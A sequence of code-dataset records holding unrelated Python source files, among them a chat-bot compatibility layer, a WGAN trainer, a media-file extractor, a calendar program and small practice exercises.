``friend``、``group``、``discuss``、``other`` 等。\n \"\"\"\n return self.get(\"sub_type\")\n\n @property\n def name(self):\n \"\"\"\n 事件名,对于有 `sub_type` 的事件,为 ``{type}.{detail_type}.{sub_type}``,否则为\n ``{type}.{detail_type}``。\n \"\"\"\n n = self.type + \".\" + self.detail_type\n if self.sub_type:\n n += \".\" + self.sub_type\n return n\n\n self_id: int # 机器人自身 ID\n user_id: Optional[int] # 用户 ID\n operator_id: Optional[int] # 操作者 ID\n group_id: Optional[int] # 群 ID\n discuss_id: Optional[int] # 讨论组 ID\n message_id: Optional[int] # 消息 ID\n message: Optional[Message] # 消息\n raw_message: Optional[str] # 未经 CQHTTP 处理的原始消息\n sender: Optional[Dict[str, Any]] # 消息发送者信息\n anonymous: Optional[Dict[str, Any]] # 匿名信息\n file: Optional[Dict[str, Any]] # 文件信息\n comment: Optional[str] # 请求验证消息\n flag: Optional[str] # 请求标识\n\n def copy(self):\n return Event(**self)\n\n def __getattr__(self, key) -> Optional[Any]:\n return self.get(key)\n\n def __setattr__(self, key, value) -> None:\n self[key] = value\n\n def __repr__(self) -> str:\n return f\"\"\n\n\nclass CQHttp:\n message_matcher = Matcher.new(\"message\")\n message_handlers = []\n\n notice_matcher = Matcher.new(\"notice\")\n notice_handlers = []\n\n request_matcher = Matcher.new(\"request\")\n request_handlers = []\n\n metaevent_matcher = Matcher.new(\"meta_event\")\n metaevent_handlers = []\n\n _loop: asyncio.AbstractEventLoop\n\n @staticmethod\n async def _run_handlers(handlers: List[_NoneBotHandler], bot: CQBot,\n event: NoneBotEvent):\n asyncio.ensure_future(\n asyncio.gather(\n *map(lambda f: f(bot, event), handlers), # type: ignore\n return_exceptions=True))\n\n def __init__(self):\n get_driver().on_startup(\n lambda: setattr(self, \"_loop\", asyncio.get_running_loop()))\n\n @self.message_matcher.handle()\n async def handle_message(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.message_handlers, bot, event)\n\n @self.notice_matcher.handle()\n async def handle_notice(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.notice_handlers, bot, event)\n\n @self.request_matcher.handle()\n async def handle_request(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.request_handlers, bot, event)\n\n @self.metaevent_matcher.handle()\n async def handle_metaevent(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.metaevent_handlers, bot, event)\n\n @property\n def asgi(self):\n return get_asgi()\n\n @property\n def server_app(self):\n return get_app()\n\n @property\n def logger(self):\n from nonetrip.log import logger\n\n return logger\n\n @property\n def loop(self) -> asyncio.AbstractEventLoop:\n assert isinstance(self._loop, asyncio.AbstractEventLoop)\n return self._loop\n\n @property\n def bot(self) -> CQBot:\n for bot in get_bots().values():\n if not isinstance(bot, CQBot):\n continue\n return bot\n raise ApiNotAvailable(\"nonetrip\")\n\n def _handler_factory(\n self,\n function: Callable[[Event], Coroutine],\n post_type: Optional[str] = None,\n ) -> _NoneBotHandler:\n\n async def handler(bot: CQBot, event: NoneBotEvent):\n if post_type is not None and event.post_type != post_type:\n return\n nonebot_event = Event.from_payload(event)\n if nonebot_event is None:\n return\n return await function(nonebot_event)\n\n return handler\n\n @singledispatchmethod\n def on_message(self, arg: _AsyncCallable_T) -> _AsyncCallable_T:\n self.message_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_message.register # type:ignore\n def _on_specified_message(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.message_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n @singledispatchmethod\n def on_notice(self, arg):\n self.notice_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_notice.register # type: ignore\n def _on_specified_notice(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.notice_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n @singledispatchmethod\n def on_request(self, arg: _AsyncCallable_T) -> _AsyncCallable_T:\n self.request_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_request.register # type: ignore\n def _on_specified_request(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.request_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n @singledispatchmethod\n def on_metaevent(self, arg: _AsyncCallable_T) -> _AsyncCallable_T:\n self.metaevent_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_metaevent.register # type:ignore\n def _on_specified_metaevent(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.metaevent_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n on_meta_event = on_metaevent\n\n async def send(self, event: Event, message: \"Message_T\", **kwargs):\n bot = get_bots().get(str(event.self_id))\n assert (bot is not None) and isinstance(bot, CQBot)\n message = message if isinstance(message, Message) else Message(message)\n return await bot.send(NoneBotEvent(**event), NoneBotMessage(message),\n **kwargs)\n\n async def call_action(self, action: str, **kwargs):\n return await self.bot.call_api(action, **kwargs)\n\n def __getattr__(self, key: str) -> Callable[..., Coroutine]:\n return partial(self.call_action, key)\n","repo_name":"nonebot/nonetrip","sub_path":"nonetrip/compat/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":8894,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"10735646022","text":"# https://leetcode.com/problems/remove-duplicates-from-sorted-list/\n#\n# Given a sorted linked list, delete all duplicates such that each element appear only once.\n#\n# For example,\n# Given 1->1->2, return 1->2.\n# Given 1->1->2->3->3, return 1->2->3\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if head == None: return None\n last, node = head, head.next\n while node != None:\n if node.val == last.val:\n last.next = node.next\n else:\n last = node\n node = node.next\n return head\n","repo_name":"rainzhop/cumulus-tank","sub_path":"leetcode/easy/remove-duplicates-from-sorted-list.py","file_name":"remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37204379878","text":"from collections import defaultdict\n\n\nclass Observable():\n\n def __init__(self):\n self.events = defaultdict(list)\n\n def on(self, event, *handlers):\n def _on_wrapper(*handlers):\n self.events[event].extend(handlers)\n return handlers[0]\n if handlers:\n return _on_wrapper(*handlers)\n return _on_wrapper\n\n def off(self, event=None, *handlers):\n if not event:\n self.events.clear()\n return True\n if not event in self.events:\n raise ValueError('event not found')\n if not handlers:\n self.events.pop(event)\n return True\n for callback in handlers:\n if not callback in self.events[event]:\n raise ValueError('handler not found')\n while callback in self.events[event]:\n self.events[event].remove(callback)\n return True\n\n def once(self, event, *handlers):\n def _once_wrapper(*handlers):\n def _wrapper(*args, **kw):\n for handler in handlers:\n handler(*args, **kw)\n self.off(event, _wrapper)\n return _wrapper\n if handlers:\n return self.on(event, _once_wrapper(*handlers))\n return lambda x: self.on(event, _once_wrapper(x))\n\n def trigger(self, event, *args, **kw):\n functions = self.events.get(event)\n if not functions:\n return False\n for event in functions:\n event(self, *args, **kw)\n return True\n\n\nclass Entity():\n\n event = Observable()\n\n def __init__(self):\n pass\n\n @event.on('message')\n def receive_message(self, message):\n print('@event.on(\\'message\\')', message)\n\n @event.once('killed')\n def die(self):\n print('@event.once(\\'killed\\')', 'I die just once!')\n\n\na = Entity()\n\na.event.trigger('message', 'hallo welt')\na.event.trigger('message', 'hallo welt')\na.event.trigger('message', 'hallo welt')\n\na.event.trigger('killed')\na.event.trigger('killed')\na.event.trigger('killed')","repo_name":"geselle-jan/py-test","sub_path":"observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"60795386","text":"from celery import current_app as current_celery\n\nfrom cern_search_rest_api.modules.cernsearch.celery import DeclareDeadletter\nfrom cern_search_rest_api.modules.cernsearch.views import build_blueprint, build_blueprint_record_files_content\n\n\nclass CERNSearch(object):\n \"\"\"CERN Search extension.\"\"\"\n\n def __init__(self, app=None):\n \"\"\"Extension initialization.\"\"\"\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Flask application initialization.\"\"\"\n self.init_config(app)\n\n blueprint = build_blueprint(app)\n app.register_blueprint(blueprint)\n\n blueprint_record_files_content = build_blueprint_record_files_content(app)\n app.register_blueprint(blueprint_record_files_content)\n\n current_celery.steps[\"worker\"].add(DeclareDeadletter)\n current_celery.conf.update(app.config[\"CELERYCONF_V6\"])\n self.register_signals(app)\n\n app.extensions[\"cern-search\"] = self\n\n def init_config(self, app):\n \"\"\"Initialize configuration.\"\"\"\n # Set up API endpoints for records.\n for k in dir(app.config):\n if k.startswith(\"CERN_SEARCH\"):\n app.config.setdefault(k, getattr(app.config, k))\n\n def register_signals(self, app):\n \"\"\"Register signals.\"\"\"\n if app.config[\"SEARCH_FILE_INDEXER\"]:\n from invenio_files_processor.signals import file_processed\n from invenio_files_rest.signals import file_deleted, file_uploaded\n from invenio_indexer.signals import before_record_index\n from invenio_records.signals import after_record_delete\n\n from cern_search_rest_api.modules.cernsearch.indexer import index_file_content\n from cern_search_rest_api.modules.cernsearch.receivers import (\n file_deleted_listener,\n file_processed_listener,\n file_uploaded_listener,\n record_deleted_listener,\n )\n\n file_uploaded.connect(file_uploaded_listener)\n file_processed.connect(file_processed_listener)\n file_deleted.connect(file_deleted_listener)\n after_record_delete.connect(record_deleted_listener)\n before_record_index.connect(index_file_content)\n","repo_name":"inveniosoftware-contrib/citadel-search","sub_path":"cern_search_rest_api/modules/cernsearch/ext.py","file_name":"ext.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"73165380969","text":"import re, collections, pprint\nfrom time import time\n\npp = pprint.PrettyPrinter(indent=4)\n\n#Ordinance Algorithm: For each title,\n#1) find the first instance of either ' for ' or ' No. ', and truncate\n#2) else, find the last instance of either ' at ' or ' as ', and truncate\ndef ordinance_parser(row):\n first_inst_pattern = re.compile(r\"(.+?)( for | No\\. | to | at )(.*)\")\n last_inst_pattern = re.compile(r\"(.+)( at | as )(.*)\")\n\n match = first_inst_pattern.match(row)\n if match != None:\n return match.group(1) #string\n\n else:\n match = last_inst_pattern.match(row)\n if match != None: \n return match.group(1)\n else:\n \t row_split = row.split(' ') #each title is a list of strings of words\n \t m = min(4, len(row_split))\n \t row_trunc = ' '.join(row_split[:m])\n\t\n \t return row_trunc \n\n#groups documents by title\n#Consider only the documents within the top k most common trunc_titles to be grouped\n#and indicate them with (title, text, trunc_title, TRUE, integer index of group).\n#Ungrouped docs are indicated: (title, text, trunc_title, FALSE, -1).\ndef group_titles(documentDict):\n\n trunc_titles = []\n remaining_docs = []\n indices = []\n\n keys = documentDict.keys()\n\n for key in keys:\n title, text = documentDict[key][0:2]\n \t#truncate each title using ordinance algorithm\n trunc_title = ordinance_parser(title)\n documentDict[key] = (title, text, trunc_title)\n\n trunc_titles = trunc_titles + [trunc_title]\n\n #count trunc_titles and pick out k most common\n counter = collections.Counter(trunc_titles)\n k = 17\n\n top_k = counter.most_common(k)\n top_titles = []\n total = 0\n for top, count in top_k:\n top_titles = top_titles + [top]\n total = total + count\n\n for key in keys:\n title, text, trunc = documentDict[key]\n if trunc in top_titles:\n documentDict[key] = (title, text, trunc, True, top_titles.index(trunc))\n else:\n documentDict[key] = (title, text, trunc, False, -1)\n\n pp.pprint('No. of docs organized by title analysis: ' + str(total))\n #pp.pprint(top_k)\n return documentDict\n\n#given a grouped dictionary, separate out the sorted titles and the unsorted ones\ndef title_analysis(startDict):\n\n\tt0 = time()\n\tgroupedDict = group_titles(startDict) #returns a dictionary of matter_id: (title, text, truncated_title, T/F is_this_doc_grouped_via_title_analysis, integer trunc_title_index)\n\tgroupedkeys = groupedDict.keys()\n\n\t#create a dictionary of docs not organized by title analysis\n\tremainingDict = dict()\n\tfor key in groupedkeys:\n\t\tif groupedDict[key][3] == False:\n\t\t\tremainingDict[key] = groupedDict[key]\n\n\tremainingkeys = list(remainingDict.keys())\n\n\tprint(\"There are \" + str(len(remainingkeys)) + \" documents remaining.\")\n\tprint(\"Title analysis done in %fs\" % (time() - t0))\n\n\treturn(groupedDict, remainingDict)\n","repo_name":"rebecca-burwei/city-hall-analysis","sub_path":"analyze_titles.py","file_name":"analyze_titles.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72565551207","text":"import torch as t\nimport torch.utils.data as d_utils\nimport torchvision.utils as tv_utils\nfrom ..Utilities import utilities as u\nfrom torch.autograd import Variable as V\n\n\nclass WGAN(object):\n def __init__(self, arch, ngpu):\n \"\"\"\n WGAN object. This class is a wrapper of a generalized WGAN as explained in the paper:\n WASSERSTEIN GANS by Arjovsky et.al.\n\n Instance of this class initializes the Generator and the Discriminator.\n Arguments:\n arch = Architecture to use:\n \"CIFAR10\" for CIFAR10 dataset\n \"MNIST\" for MNIST dataset\n \"Generic\" for a general Generator and Discriminator architecture\n\n For CIFAR10/MNIST: Need to input n_z also.\n For Generic: Need to input image_size, n_z, n_chan, hiddens\n\n {'arch_type': ,\n 'params': as above}\n\n Example:\n {'arch_type': \"CIFAR10\",\n 'params': {'n_z': 128}}\n {'arch_type': \"Generic\",\n 'params': {'image_size': 32, 'n_z': 128, 'n_chan': 3, 'hiddens': }}\n\n image_size = Height / width of the real images\n n_z = Dimensionality of the latent space\n n_chan = Number of channels of the real images\n hiddens = Number of feature maps in the first layer of the generator and discriminator\n Format:\n hiddens = {'gen': n_gen_hidden,\n 'dis': n_dis_hidden}\n ngpu = Number of gpus to be allocated, if to be run on gpu\n \"\"\"\n super(WGAN, self).__init__()\n if arch['arch_type'] == 'Generic':\n from ..Architectures import Generic as DG\n self.Gen_net = DG.Generator(image_size=arch['params']['image_size'], n_z=arch['params']['n_z'],\n n_chan=arch['params']['n_chan'], n_hidden=arch['params']['hiddens']['gen'],\n ngpu=ngpu)\n self.Dis_net = DG.Discriminator(image_size=arch['params']['image_size'], n_chan=arch['params']['n_chan'],\n n_hidden=arch['params']['hiddens']['dis'], ngpu=ngpu)\n self.image_size = arch['params']['image_size']\n self.n_chan = arch['params']['n_chan']\n\n elif arch['arch_type'] == 'MNIST':\n from ..Architectures import MNIST as DG\n self.Gen_net = DG.Generator(n_z=arch['params']['n_z'], ngpu=ngpu)\n self.Dis_net = DG.Discriminator(ngpu=ngpu)\n self.image_size = 28\n self.n_chan = 1\n\n elif arch['arch_type'] == 'CIFAR10':\n from ..Architectures import CIFAR10 as DG\n self.Gen_net = DG.Generator(n_z=arch['params']['n_z'], ngpu=ngpu, gen_type=arch['params']['gen_type'])\n self.Dis_net = DG.Discriminator(ngpu=ngpu, dis_type=arch['params']['dis_type'])\n self.image_size = 32\n self.n_chan = 3\n\n self.ngpu = ngpu\n self.n_z = arch['params']['n_z']\n\n def train(self, dataset, batch_size, n_iters, dis_iters_per_gen_iter, clamps, optimizer_details,\n show_period=50, display_images=True, misc_options=['init_scheme', 'save_model']):\n \"\"\"\n Train function of the WGAN class. This starts training the model.\n Arguments:\n dataset = torch.utils.data.Dataset instance\n batch_size = batch size to be used throughout the training\n n_iters = Number of generator iterations to run the training for\n dis_iters_per_gen_iter = Number of discriminator iterations per generator iteration\n clamps = The weight thresholding clamps.\n Format:\n clamps = {'lower': , 'upper': }\n optimizer_details = Dictionary representing the details for optimizers for generator and discriminator\n Format:\n optimizer_details = {'gen':\n {'name' : Name of optimizer,\n 'learn_rate' : learning rate,\n 'betas' : (beta_1, beta_2), => Optional, if using Adam/Adamax\n 'momentum' : momentum, => Optional, if using momentum SGD/NAG\n 'nesterov' : True/False, => Optional, if using NAG},\n 'dis':\n }\n show_period (opt) = Prints the errors with current iteration number every show_period iterations\n display_images (opt) = If true, saves the real, reconstructed and generated images\n from noise every show_period*5 iterations\n misc_options (opt) = List of strings.\n - Add 'init_scheme' to the list, if you want to implement\n specific initialization schemes\n - Add 'save_model' to the list, if you want to save the model\n after n_iters iterations of training\n \"\"\"\n optimizer_details['gen']['params'] = self.Gen_net.parameters()\n optimizer_details['dis']['params'] = self.Dis_net.parameters()\n G_optmzr = u.get_optimizer_with_params(optimizer_details['gen'])\n D_optmzr = u.get_optimizer_with_params(optimizer_details['dis'])\n\n inpt = t.FloatTensor(batch_size, self.n_chan, self.image_size, self.image_size)\n noise = t.FloatTensor(batch_size, self.n_z, 1, 1)\n pos = t.FloatTensor([1])\n neg = pos.mul(-1)\n\n if display_images:\n fixed_noise = t.randn(batch_size, self.n_z, 1, 1)\n\n if 'init_scheme' in misc_options:\n self.Gen_net.apply(u.weight_init_scheme)\n self.Dis_net.apply(u.weight_init_scheme)\n\n if self.ngpu > 0:\n inpt = inpt.cuda()\n noise = noise.cuda()\n pos = pos.cuda()\n neg = neg.cuda()\n if display_images:\n fixed_noise = fixed_noise.cuda()\n\n self.Gen_net = self.Gen_net.cuda()\n self.Dis_net = self.Dis_net.cuda()\n\n self.Gen_net.train()\n self.Dis_net.train()\n\n d_loader = d_utils.DataLoader(dataset, batch_size, shuffle=True)\n\n # Train loop\n # Details to be followed:\n # 1. Train the discriminator first for dis_iters_per_gen_iter times. Train the discriminator with reals\n # and then with fakes\n # 2. Train the generator after training the discriminator\n\n gen_iters = 0\n flag = False\n print('Training has started')\n while not flag:\n d_iter = iter(d_loader)\n i = 0\n while i < len(d_loader):\n\n # Training the discriminator\n # We don't want to evaluate the gradients for the Generator during Discriminator training\n for params in self.Gen_net.parameters():\n params.requires_grad = False\n\n for params in self.Dis_net.parameters():\n params.requires_grad = True\n\n j = 0\n # Train the discriminator dis_iters_per_gen_iter times\n while j < dis_iters_per_gen_iter and i < len(d_loader):\n for params in self.Dis_net.parameters():\n params.data.clamp_(clamps['lower'], clamps['upper'])\n\n self.Dis_net.zero_grad()\n cur_data = d_iter.next()\n i = i + 1\n\n # Training with reals. These are obviously true in the discriminator's POV\n X, _ = cur_data\n if inpt.size() != X.size():\n inpt.resize_(X.size(0), X.size(1), X.size(2), X.size(3))\n inpt.copy_(X)\n inptV = V(inpt)\n\n otpt = self.Dis_net(inptV)\n otpt = u.de_sigmoid(otpt)\n err_D_r = (otpt.mean(0)).view(1)\n err_D_r.backward(pos)\n\n # Training with fakes. These are false in the discriminator's POV\n\n # We want same amount of fake data as real data\n if noise.size(0) != inpt.size(0):\n noise.resize_(inpt.size(0), noise.size(1), noise.size(2), noise.size(3))\n noise.normal_(0, 1)\n noiseV = V(noise)\n X_f = self.Gen_net(noiseV)\n otpt = self.Dis_net(X_f)\n otpt = u.de_sigmoid(otpt)\n err_D_f = (otpt.mean(0)).view(1)\n err_D_f.backward(neg)\n err_D = err_D_r - err_D_f\n D_optmzr.step()\n j = j + 1\n\n # Training the generator\n # We don't want to evaluate the gradients for the Discriminator during Generator training\n for params in self.Dis_net.parameters():\n params.requires_grad = False\n\n for params in self.Gen_net.parameters():\n params.requires_grad = True\n\n self.Gen_net.zero_grad()\n # The fake are reals in the Generator's POV\n noise.normal_(0, 1)\n noiseV = V(noise)\n X_gen = self.Gen_net(noiseV)\n otpt = self.Dis_net(X_gen)\n otpt = u.de_sigmoid(otpt)\n err_G = (otpt.mean(0)).view(1)\n err_G.backward()\n G_optmzr.step()\n\n gen_iters = gen_iters + 1\n\n # Showing the Progress every show_period iterations\n if gen_iters % show_period == 0:\n print('[{0}/{1}]\\tDiscriminator Error:\\t{2}\\tGenerator Error:\\t{3}'\n .format(gen_iters, n_iters, round(err_D.data[0], 5), round(err_G.data[0], 5)))\n\n # Saving the generated images every show_period*5 iterations\n if display_images:\n if gen_iters % (show_period*5) == 0:\n self.Gen_net.eval()\n gen_imgs = self.Gen_net(V(fixed_noise))\n\n gen_imgs.data = gen_imgs.data.mul(0.5).add(0.5)\n tv_utils.save_image(gen_imgs.data,\n 'WGAN_Generated_images@iteration={0}.png'.format(gen_iters))\n self.Gen_net.train()\n if gen_iters == n_iters:\n flag = True\n break\n\n if 'save_model' in misc_options and flag:\n t.save(self.Gen_net.state_dict(), 'WGAN_Gen_net_trained_model.pth')\n t.save(self.Dis_net.state_dict(), 'WGAN_Dis_net_trained_model.pth')\n print('Training over and model(s) saved')\n\n elif flag:\n print('Training is over')\n","repo_name":"DL-IT/generative_zoo","sub_path":"Modules/WGAN.py","file_name":"WGAN.py","file_ext":"py","file_size_in_byte":11326,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"28190813921","text":"'''\nAffiche la liste des vendredis 13 présents dans une année\nparamètres demandés : jour de la semaine au 1er janvier et année bissextile ou non.\nPython 3.x uniquement.\nIl s'agit d'un programme que j'ai rédigé il y a un an mais après tout il peut tout à faire servir dans le cadre de cet exercice :)\nA bientot!\nPol\n'''\n\ncal=[]\nJ=[\"lundi\",\"mardi\",\"mercredi\",\"jeudi\",\"vendredi\",\"samedi\",\"dimanche\"]\nprint(\"Bonjour!\")\nprint(\"Je vais t'indiquer la liste des Vendredi 13 d'une année que nous allons définir ensemble\")\n\n#année bissextile\nbissextile='z'\nwhile bissextile.lower() not in ('o','n'):\n bissextile=str(input(\"Souhaites-tu que l'année soit bissextile? (o pour oui, n pour non): \"))\nif bissextile=='o': f=29\nelse : f=28\n\n#saisie du jour au 1er janvier\nj=\"dredi\"\nwhile j.lower() not in (J):\n j=str(input(\"A quel jour de la semaine correspond le 1er janvier de ton annee? : \"))\na=J.index(j.lower())\n\nM=[[\"janvier\",31],[\"février\",f],[\"mars\",31],[\"avril\",30],[\"mai\",31],[\"juin\",30],[\"juillet\",31],[\"aout\",31],[\"septembre\",30],[\"octobre\",31],[\"novembre\",30],[\"décembre\",31]]\njour=[]\nnum=[]\nmois=[]\n\n#remplissage du calendrier\nfor j in range(12):\n for i in range (M[j][1]):\n jour.append(J[(a)%7])\n num.append(i+1)\n mois.append(M[j][0])\n cal.append([jour[i],num[i],mois[i]])\n a=a+1\n jour=[]\n num=[]\n mois=[]\n\n#affichage (en enlevant la condition tu as un joli calendrier sur l'année ...)\nprint(\"Et voici la liste :\")\nfor i in range(365):\n if cal[i][0]==\"vendredi\" and cal[i][1]==13:\n print(\"- \",end='')\n for z in range (3):\n print(cal[i][z],end=' ')\n print()\n\nprint(\"Au revoir!\")\ninput(\"tape ENTREE pour terminer\")\n","repo_name":"gitpqd/openclassrooms","sub_path":"vendredi13.py","file_name":"vendredi13.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72296605929","text":"#!/usr/bin/python3\n\n\nimport argparse\nimport glob\nimport os\nimport shutil\nfrom pathlib import Path\n\nimport config\nimport run\nimport util\nimport util_movie\nimport util_tv\nfrom printout import cstr, pfcs\n\nOPJ = os.path.join\nCFG = config.ConfigurationManager()\n\n\ndef validate_path(path):\n if isinstance(path, str):\n path = Path(path)\n if not isinstance(path, Path):\n print(f\"invalid path: {path}\")\n return None\n path = path.resolve()\n if not path.exists():\n print(f\"path does not exist: {str(path)}\")\n return None\n return path\n\n\ndef find_rar_in_path(path):\n path = validate_path(path)\n if not path:\n return None\n rar_files = list(path.glob(\"**/*.rar\"))\n if len(rar_files) > 1:\n for rar_file in rar_files:\n if rar_file.name.endswith(\"01.rar\"):\n return rar_file\n try:\n return rar_files[0]\n except IndexError:\n return None\n\n\ndef find_mkv_in_path(path):\n path = validate_path(path)\n if not path:\n return None\n skip_list = [\"Sample\", \"sample\"]\n found_files = path.glob(\"**/*.mkv\")\n mkv_files = []\n for f in found_files:\n if any([x in str(f) for x in skip_list]):\n continue\n mkv_files.append(f)\n if len(mkv_files) > 1:\n return None # TODO: determine which file is valid\n try:\n return mkv_files[0]\n except IndexError:\n return None\n\n\ndef find_nfo_file_in_path(path):\n path = validate_path(path)\n if not path:\n return None\n try:\n return list(path.glob(\"**/*.nfo\"))[0] # TODO: validate nfo file?\n except IndexError:\n return None\n\n\ndef determine_movie_destination(movie_name):\n letter = util_movie.determine_letter(movie_name)\n if isinstance(movie_name, Path):\n movie_name = movie_name.name\n return OPJ(CFG.get('path_film'), letter, movie_name)\n\n\ndef determine_episode_destination(episode_name):\n show = util_tv.determine_show_from_episode_name(episode_name)\n if not show:\n print(f\"could not determine show for {cstr(episode_name, 'lblue')}\")\n show = util_tv.guess_show_name_from_episode_name(episode_name)\n if not show:\n return None\n print(f\"guessing: {cstr(show, 'orange')}\")\n path = OPJ(CFG.get('path_tv'), show)\n if not os.path.exists(path):\n print(f\"{cstr(path, 'orange')} does not exist! will create\")\n season = util_tv.parse_season(episode_name)\n if not season:\n print(f\"could not determine season of {cstr(episode_name, 'orange')}\")\n return None\n return OPJ(path, f'S{season:02d}')\n\n\ndef process_movie_dir(movie_dir_source: Path):\n name = movie_dir_source.name\n pfcs(f\"processing: i[{name}] as type b[movie dir]\")\n nfo_loc = find_nfo_file_in_path(movie_dir_source)\n rar_loc = find_rar_in_path(movie_dir_source)\n mkv_loc = find_mkv_in_path(movie_dir_source)\n if not rar_loc and not mkv_loc:\n pfcs(f\"could e[not] find item to process in w[{movie_dir_source}]!\")\n return\n if rar_loc and mkv_loc:\n pfcs(f\"found e[both] rar and mkv in w[{movie_dir_source}]!\")\n return\n pfcs(f\"found file: i[{mkv_loc or rar_loc}]\")\n dest = determine_movie_destination(name)\n pfcs(f\"destination: i[{dest}]\")\n if rar_loc:\n if not run.extract(rar_loc, dest, create_dirs=True):\n return # extract failed\n if mkv_loc:\n run.move_file(mkv_loc, dest, create_dirs=True)\n if nfo_loc:\n imdb_id = util.parse_imdbid_from_file(nfo_loc)\n if imdb_id:\n print(\n f\"found imdb-id: {cstr(imdb_id, 154)}, will create movie.nfo\")\n util_movie.create_movie_nfo(dest, imdb_id)\n shutil.rmtree(movie_dir_source)\n print(f'removed {cstr(movie_dir_source, \"orange\")}')\n\n\ndef process_movie_file(movie_file_path):\n movie_path = validate_path(movie_file_path)\n if not movie_file_path:\n return\n if not movie_file_path.is_file():\n print(f\"path {movie_file_path.name} is not a file!\")\n return\n pfcs(f\"processing: i[{movie_file_path.name}] as type b[movie file]\")\n if not movie_file_path.suffix in util.video_extensions():\n pfcs(f\"could not determine destination for w[{movie_file_path.name}]\")\n return\n directory = str(movie_file_path.name).replace(movie_file_path.suffix, \"\")\n dest = determine_movie_destination(directory)\n pfcs(f\"destination: i[{dest}]\")\n run.move_file(movie_file_path, dest, create_dirs=True)\n\n\ndef process_movie(movie_path: Path):\n movie_path = validate_path(movie_path)\n if not movie_path:\n return\n if movie_path.is_dir():\n process_movie_dir(movie_path)\n else:\n process_movie_file(movie_path)\n\n\ndef process_episode(ep_path: Path):\n ep_path = validate_path(ep_path)\n if not ep_path:\n return\n dest = determine_episode_destination(ep_path.name)\n if not dest:\n pfcs(f\"could not determine destination for w[{ep_path}]\")\n return\n if ep_path.is_dir():\n pfcs(f\"processing: i[{ep_path.name}] as type b[episode dir]\")\n rar_loc = find_rar_in_path(ep_path)\n if not run.extract(rar_loc, dest, create_dirs=True):\n return # extract failed\n return\n pfcs(f\"processing: i[{ep_path.name}] as type b[episode file]\")\n run.move_file(ep_path, dest, create_dirs=True)\n\n\ndef extract_item(source_item_path):\n source_item_path = validate_path(source_item_path)\n if not source_item_path:\n return\n name = source_item_path.name\n if util_movie.is_movie(name):\n process_movie(source_item_path)\n elif util_tv.is_episode(name):\n process_episode(source_item_path)\n elif util_tv.is_season(name):\n if source_item_path.is_dir():\n pfcs(f\"processing: i[{name}] as type b[season dir]\")\n for item in source_item_path.iterdir():\n extract_item(item)\n pfcs(f\"g[done!] please remove w[{name}] manually.\")\n else:\n pfcs(f\"could not determine type of w[{name}]\")\n\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(description='extractor')\n PARSER.add_argument('source', type=str, help='item(s) to process')\n ARGS, _ = PARSER.parse_known_args()\n CURRENT_DIR = Path.cwd()\n if '*' in ARGS.source:\n items = glob.glob(ARGS.source)\n [extract_item(CURRENT_DIR / i) for i in items]\n else:\n extract_item(Path(ARGS.source))\n","repo_name":"GoblinDynamiteer/scripts","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30838258228","text":"\n\ndef bisearch(arr,n):\n low=0\n high=len(arr)-1\n count=0\n while low <= high:\n mid=(low+high) / 2\n\n if(arr[mid] <= n):\n count+=(mid-low+1)\n low=mid+1\n else:\n high=mid-1\n return count\n\ndef issame(a,b):\n arr=[]\n count=0\n b.sort()\n n=0\n for i in range(1,len(a)):\n count=bisearch(b,i)\n a[n]=count\n n=i\n \n return a\n \nx=[1,2,3,4,7,9]\ny=[0,1,2,1,1,4]\nprint(issame(x,y))\n\n","repo_name":"Ashis101/py-dsa","sub_path":"practise.py","file_name":"practise.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25489015623","text":"from cProfile import label\nimport csv\nimport matplotlib.pyplot as plot\n\n\n\ndata = []\nwith open('students-scores.csv') as infile:\n text = infile.read().split()\n captions = text[0].split(',')\n for e in text[1:]:\n stu = 